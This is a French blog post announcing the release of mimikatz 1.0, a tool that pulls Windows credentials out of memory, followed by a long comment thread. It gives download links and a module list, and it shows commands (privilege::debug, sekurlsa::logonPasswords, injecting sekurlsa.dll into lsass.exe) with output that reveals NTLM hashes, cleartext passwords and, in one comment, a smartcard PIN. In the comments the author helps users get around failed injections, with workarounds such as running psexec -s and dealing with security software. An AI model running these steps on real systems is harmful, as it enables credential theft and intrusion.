mimikatz

mimikatz 1.0 vient de sortir en version alpha beta RC !

2.0 alpha inside ;)

binaires :
- http://blog.gentilkiwi.com/downloads/mimikatz_trunk.7z
- http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
sources : https://code.google.com/p/mimikatz/
présentations : http://blog.gentilkiwi.com/presentations

Pour les pressés cherchant des mots de passe…

A exécuter en administrateur :

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
        msv1_0 :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234/
...

Modules

mimikatz est maintenant organisé autours de modules locaux :

"standard" ; commandes de base
crypto ; Cryptographie et certificats
sekurlsa ; Dump de hashes et de mots de passes Windows
system ; Gestion système
process ; Manipulation des processus
thread ; Manipulation des threads
service ; Manipulation des services
privilege ; Manipulation des privilèges
winmine ; Manipulation du démineur de Windows XP (démonstration)
minesweeper ; Manipulation du démineur de Windows Vista et 7 (démonstration)
nogpo ; Pour éviter quelques GPO triviales
samdump ; Dump de SAM offline
inject ; Injecteur de librairies
ts ; Manipulations Terminal Server
divers ; Fonctions diverses trop petites pour s’émanciper

A part pour le module « standard », la séparation du module et de la fonction appelée se fait avec le séparateur ::
Exemple : inject::process lsass.exe sekurlsa.dll

Librairies

Ce n’est pas forcément le plus discret, mais j’aime injecter des librairies

sekurlsa ; manipulation des données de sécurités dans LSASS
klock ; manipulation de bureaux
kelloworld ; libraire à injecter, pour l’exemple

Pilote

Être administrateur n’est pas toujours suffisant, il peut aussi être intéressant de disposer d’un point d’entrée en mode utilisateur.
Un pilote, mimikatz.sys est donc disponible.

pilote mimikatz.sys ; manipulation noyau

Les commandes distantes peuvent être appelées en les précédants d’un :

@ pour les libraires (@ seul clos la connexion à la librairie, et la décharge)
! pour le pilote mimikatz (! seul clos la connexion au pilote)

160 réflexions au sujet de « mimikatz »

Ping : effeciently dumping Windows password hashes « Daniel Weis's I.T Security Blog
Ping : effeciently dumping Windows password hashes - Daniel Weis - Blogs - Telligent
Ping : Dis9 Team » Dump Windows password hashes efficiently
Ping : Mimikatz Contraseñas de Windows « Seguridad y Redes
Le 08/02/2012 à 09:36, archenroot a dit :

Unbeatable tool :), nice work.

Répondre ↓
Ping : Obtener Contraseña Administrador de Windows desde Windows (Sin Hash NTML/LM) « sanchezdiego.com.ar
Ping : Latino » Blog Archive » Mimikatz Contraseñas de Windows
Le 16/02/2012 à 16:12, Carsten a dit :

Love this tool! Had no idea Windows stored passwords in plaintext, by the way.

Répondre ↓
- Le 16/02/2012 à 21:27, gentilkiwi a dit :
  
  Windows don’t store passwords in plaintext, it keeps them in memory in reversible way.
  
  Répondre ↓
Le 16/02/2012 à 17:07, Paul J a dit :

How did you come about finding the exploit?

Répondre ↓
- Le 16/02/2012 à 21:31, gentilkiwi a dit :
  
  This is not an exploit, but a memory trick :)
  Like said in http://blog.gentilkiwi.com/securite/pass-the-pass , found in searching SSO mechanism of Terminal Server, and WDigest
  
  Répondre ↓
Ping : Dumping Cleartext Credentials with Mimikatz « Daniel Weis's I.T Security Blog
Ping : Dumping Cleartext Credentials with Mimikatz - Daniel Weis - Blogs - Telligent
Ping : Security News « CyberOperations
Le 18/02/2012 à 23:26, pipas a dit :

Great tool congrats.

Merci pour mimikatz ;)

Répondre ↓
Ping : mimikatz: Tool To Recover Cleartext Passwords From Lsass – Dacheng Luo
Ping : Jeremiah Grossman, Security News – Episode 278 » 華人資安論壇與資安認知教育網誌
Ping : FeiFei's Blog » 获取Windows系统明文密码神器
Le 23/02/2012 à 10:52, rem7ter a dit :

Input » ^Z » in mimikatz.exe command, it’s will run always you ctrl-c.

Répondre ↓
Ping : 调试器神器 – mimikatz-获取windows处于active状态账号明文密码[转] | Ｖｉｓｉｏｎ＇ｓ　Ｂｌｏｇ
Le 23/02/2012 à 16:06, XFAN a dit :

very good! thanks ~~~

Répondre ↓
Le 24/02/2012 à 01:10, piaoye a dit :

3Q!

Répondre ↓
Ping : 轻量级神器 mimikatz – 直接抓取 Windows 明文密码！ - Firedli's Blog
Le 24/02/2012 à 12:49, Sk a dit :

really an amazing tool! thanks for sharing! nice work!!

Répondre ↓
Le 26/02/2012 à 07:33, zp a dit :

ccan i use it on win7?

Répondre ↓
- Le 26/02/2012 à 14:15, gentilkiwi a dit :
  
  for sure !
  (don’t forget to run it as administrator ;))
  
  Répondre ↓
  - Le 27/02/2012 à 13:17, zp a dit :
    
    thank you i will try it
  - Le 27/02/2012 à 13:36, zp a dit :
    
    i run it as administrator win7 sp1
    but error
    Hints are as follows:
    Demande d’ACTIVATION du privilege: SeDebugPriviliege:OK
    Erreur:Impossible d’injecter !; 拒绝访问
    Erreur:pas ou plus de communication etablie
    
    How so? thank
  - Le 27/02/2012 à 19:59, gentilkiwi a dit :
    
    Send me full console output.
  - Le 28/02/2012 à 07:41, zp a dit :
    
    this is full console output.
    win7 sp1 administrator run it
    
    mimikatz # privilege::debug
    Demande d’ACTIVATION du privilège : SeDebugPrivilege : OK
    
    mimikatz # inject::process lsass.exe sekurlsa.dll
    PROCESSENTRY32(lsass.exe).th32ProcessID = 580
    Erreur : Impossible d’injecter ! ; (0×00000005) 拒绝访问。
    
    mimikatz # @getLogonPasswords
    Erreur : pas ou plus de communication établie
  - Le 22/03/2012 à 00:39, gentilkiwi a dit :
    
    Acces denied come from 360 Safe security functions :)
  - Le 05/07/2012 à 14:48, jhb a dit :
    
    i shut down 360 . It still can’t inject
  - Le 05/07/2012 à 21:04, gentilkiwi a dit :
    
    Even disabled, some 360′s functions still reside in memory ; see my post about it : http://blog.gentilkiwi.com/retro-ingenierie/360-safe-hook-noyau
Ping : 通杀WIN服务器得明文密码神器
Ping : Outils, services, sites à (re)découvrir 2012 S08 | La Mare du Gof
Le 27/02/2012 à 04:02, BelEtb a dit :

Great! Thank U.

Répondre ↓
Le 27/02/2012 à 19:20, william sanoma a dit :

secpol.msc -> Local Policies -> User Rights Assignments -> Debug Programs
Remove Administrators/System
This is also how you stop Pass-The-hash from working too.
I’ve tried on Win7 and XP SP3 (english) and I get this error on XP
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 640
Erreur : Impossible d’injecter ! ; (0×00000008) Not enough storage is available to process this command.
Same wtih Win7(64-bit) only the hex is different
Erreur : Impossible d’injecter ! ; (0xc0000022) {Access Denied} A process has requested access to an object, but has not been granted those access rights.

Répondre ↓
- Le 27/02/2012 à 19:57, william sanoma a dit :
  
  Nevermind :) I was not using the 64-bit (x64) version on my 64-bit OS.
  Also to work around removing the sedebug priv using group policy and or secpol.msc, you can run as system (psexec -s cmd.exe) and everything works well. Very good tool, I hope you make even more additions! (@dumpall would be cool too, dump anything and everything this tool has to offer)
  -william
  
  Répondre ↓
- Le 27/02/2012 à 19:58, gentilkiwi a dit :
  
  0×00000008 is from NT 5 RDP session, not because debug right removed ;)
  in both case : psexec -s XXX … no need of debug right, and bypass session isolation in RDP ;)
  
  Répondre ↓
Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码！
Ping : 百寞' Blog » Blog Archive » 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码！
Ping : 转：windows下轻量级调试神器—mimikatz – 2哥博客|H3CIE|网络技术|数据中心|路由交换|网络安全|黑客技术|CCIE|Linux|服务器|wordpress
Le 04/03/2012 à 02:28, HEHE a dit :

You can solve the problem of CreateRemoteThread the
http://www.cnasm.com/view.asp?classid=51&newsid=292

Répondre ↓
- Le 04/03/2012 à 02:36, gentilkiwi a dit :
  
  Thank’s !!! I’ve already relied on manual Stack creation and get it worked, but with NT 6, I prefer RtlCreateUserThread :)
  
  Répondre ↓
Ping : 神器mimikatz使用命令方法总结 | Ｖｉｓｉｏｎ＇ｓ　Ｂｌｏｇ
Ping : mimikatz的使用方法总结 « Crackerban Team
Le 08/03/2012 à 07:11, dario90 a dit :

it’s necessary an english version please

Répondre ↓
Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码! « x7z|关注网络安全|Web安全|最新0day漏洞|网站安全顾问
Le 09/03/2012 à 22:51, dingo9 a dit :

Isn’t this how Windows can send HTTP-Authentication using IE without prompting for the password? If so, could a program like Firefox, launched as the same user who is logged on, read those credentials and also pass HTTP-authentication without being prompted? This could add functionality to something like FF if this was so, could it not? I mean IE does it…
-mandingo-

Répondre ↓
- Le 09/03/2012 à 23:12, gentilkiwi a dit :
  
  In some way yes. But Windows does not need it for Kerberos or NTLM auth. Just for some Digest auth.
  FireFox can use Kerberos and NTLM auth with SSO (see network.negotiate-auth.*), maybe wdigest too ?
  In all case, no need for hack for that, Windows allow « normal » API to obtain responses to challenges.
  
  Répondre ↓
  - Le 09/03/2012 à 23:25, dingo9 a dit :
    
    I meant digest-auth. I wonder if FF could read it and then pass it on, or if they choose not to :)
  - Le 10/03/2012 à 00:01, gentilkiwi a dit :
    
    It seems it’s a choice ; SSPI supports wdigest.
    cf. http://technet.microsoft.com/library/cc780455.aspx
Ping : Unsung Heros (the list) « Cатсн²² (in)sесuяitу / ChrisJohnRiley

C:\Program Files\WinRAR\ts\Win32&gt;mimikatz.exe
mimikatz 1.0 x86 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 452
Erreur : Impossible d'injecter ! ; (0x00000008) 存储空间不足，无法处理此命令。

mimikatz #

help me

Répondre ↓

Le 12/03/2012 à 20:56, gentilkiwi a dit :

On NT 5 RDP use psexec -s … (and avoid privilege::debug ;))

Répondre ↓

Le 12/03/2012 à 21:28, dingo9 a dit :

FYI, Windows 8 (dev-preview) is working for me so far. Haven’t tried all the commands yet but so far so good. Is there a way to run all commands planned? Maybe output to a single file?
-mandingo-

Répondre ↓
- Le 12/03/2012 à 21:46, gentilkiwi a dit :
  
  I’ve some surprises for windows 8 consummer preview :)
  they’re are some problem with the current version, internal is 90% for x64, and 70% x86.
  
  Répondre ↓
Ping : Drunken Security News – Episode 279 » 信息安全播客
Ping : Tonya Bacam, Security Onion – Episode 279 » 華人資安論壇與資安認知教育網誌
Ping : Live from CCDC – Episode 280 » 華人資安論壇與資安認知教育網誌
Ping : Recuperando contraseñas de Windows en texto plano (I de II)
Ping : 牛X神器-mimikatz | Yoio's Blog
Ping : 欺天: NLP | HACK | 社会工程学 | 金融
Ping : Remotely Recovering Windows Passwords in Plain Text « CYBER ARMS – Computer Security
Le 16/04/2012 à 20:04, John a dit :

Is source code available? Thanks

Répondre ↓
- Le 16/04/2012 à 22:26, gentilkiwi a dit :
  
  no, but getXXFunctions list all you need…
  
  Répondre ↓
Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码 | Linglin'S Blog
Ping : Episode 647 – Quantum Encryption,TriCk, 100 days, Mimikatz, and MySQL DoS | InfoSec Daily
Ping : Obtener Contraseña Administrador de Windows desde Windows (Sin Hash NTML/LM) | GEEKNOPATAS
Le 22/04/2012 à 18:42, Fliego a dit :

Пополним коллекцию благодарностей на иностранных языках :)
Спасибо!

Répondre ↓
Le 23/04/2012 à 14:35, Chris a dit :

Hey, how about a natively english version? I had french in school, but it’s a bit rusty tbh ;)

Répondre ↓
Ping : Pw » 关注互联网技术,专注于信息安全,记录生命点滴故事.
Ping : Recovering Windows Passwords Remotely in Plain Text | IT Security
Ping : mimikatz获取Windows系统明文密码神器 | 网络大学|Network University
Ping : Mimikatz creator to Speak at PH Days Conference « CYBER ARMS – Computer Security
Le 30/05/2012 à 19:27, qfdk a dit :

LOL,C’est un logiciel qui peut faire beaucoup de trucs,ça me plais beaucoup ^.^
mais il y a trop de méthodes TT，chaque fois je dois venir ici pour chercher le rappel ,peut-être c’est moi qui me suis trompé ,puisque la langue française est compliqué pour nous ,toute façon il faut apprendre .
Bon courage et je vous souhaite une très bonne année 2012 .

Répondre ↓
Le 30/05/2012 à 20:23, Ryan a dit :

Very nice work. I successfully got clear text passwords by injecting into LSASS on Windows 2008 R2, however, I had a problem on Windows 7 x64. I launched a local cmd.exe shell as Local System by using PsExec. From there I launched mimikatz. After typing @getLogonPasswords, the data was there but the wdigest passwords were completely garbled text. I guess something went wrong with the injection. I wonder if it has anything to do with ASLR.

Répondre ↓
- Le 30/05/2012 à 21:41, gentilkiwi a dit :
  
  No problem with ASLR ;) It must be unicode or incorect unicode string for computer account, but appear to be valid in unicode… :( (try chcp before ;))
  Why did you use psexec for get system ? you can use privilege::debug
  
  Répondre ↓
  - Le 30/05/2012 à 22:02, Ryan a dit :
    
    Yes, privilege::debug worked better. On this PC, I was only able to retrieve my smartcard PIN, because I don’t log in with my password. :)
  - Le 30/05/2012 à 22:05, gentilkiwi a dit :
    
    mimikatz dumped your pin code ? what is your middleware for smartcard ?
Le 30/05/2012 à 22:16, Ryan a dit :

RSA

Répondre ↓
- Le 30/05/2012 à 22:17, gentilkiwi a dit :
  
  SecureID ?
  mimikatz displayed your pin code of RSA SecureID ? (or entire pin + code ?)
  If so, I’ll LOVE this provider !
  
  Répondre ↓
  - Le 31/05/2012 à 00:50, Ryan a dit :
    
    Yeah — it showed just the portion of the PIN that I type to login/unlock my PC. It did not of course display the automatically changing code that is shown on the LCD display. :)

Note that I must have recently unlocked my PC in order for the RSA SecureID PIN to show up — if I have not logged in or unlocked the PC within 30 minutes or so, the PIN does not appear in the list. Alright, here is my mimikatz output. I ran it first, and did not see RSA PIN. Then, I locked my workstation and then unlocked it, then I ran @getLogonPasswords again. Then I did see my RSA PIN displayed. I have tried to change names and hashes to protect the innocent. :)

mimikatz # @getLogonPasswords

Authentification Id         : 0;618713
Package d'authentification  : Kerberos
Utilisateur principal       : demoUser
Domaine d'authentification  : FakeDomain
        msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
        wdigest :
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;613648
Package d'authentification  : Kerberos
Utilisateur principal       : demoUser
Domaine d'authentification  : FakeDomain
        msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
        wdigest :
        tspkg :         n.t. (LUID KO)

mimikatz # @getLogonPasswords

Authentification Id         : 0;618713
Package d'authentification  : Kerberos
Utilisateur principal       : demoUser
Domaine d'authentification  : FakeDomain
        msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
        wdigest :       THIS_IS_MY_RSA_PIN
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;613648
Package d'authentification  : Kerberos
Utilisateur principal       : demoUser
Domaine d'authentification  : FakeDomain
        msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
        wdigest :       THIS_IS_MY_RSA_PIN
        tspkg :         n.t. (LUID KO)